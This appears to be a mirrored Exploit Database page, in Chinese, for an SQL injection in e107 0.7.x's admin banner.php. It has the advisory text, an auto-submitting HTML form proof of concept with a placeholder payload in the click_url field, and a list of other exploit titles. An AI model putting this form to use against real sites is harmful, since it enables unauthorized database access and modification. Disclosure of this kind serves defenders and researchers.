e107 0.7.x – ‘/e107_admin/banner.php’ SQL Injection

Exploit Database
88 阅读

作者： High-Tech Bridge SA

日期： 2010-04-21
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/33857/

source: https://www.securityfocus.com/bid/39609/info

e107 is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

<form action=http://host/e107_admin/banner.php method=POST name=f> <input type=hidden name=createbanner value="Create+New+Banner" > <input type=hidden name=click_url value="' ANY_SQL_HERE " > </form> <script> document.f.submit(); </script>

last Exploits
e107 0.7.x – ‘/e107_admin/banner.php’ SQL Injection的更多信息

MyBB Delete Account Plugin 1.4 – Cross-Site Scripting：
Joomla! Component com_sar_news – ‘id’ SQL Injection：
Pimcore CMS 1.4.9 <2.1.0 - Multiple Vulnerabilities：
SN News 1.2 – ‘visualiza.php’ SQL Injection：
Freepbx < 2.11.1.5 - Remote Code Execution：
SmarterMail < 7.2.3925 - Persistent Cross-Site Scripting：
Joomla! Component Spider FAQ Lite 1.3.1 – SQL Injection：
Selea Targa IP OCR-ANPR Camera – Multiple SSRF (Unauthenticated)：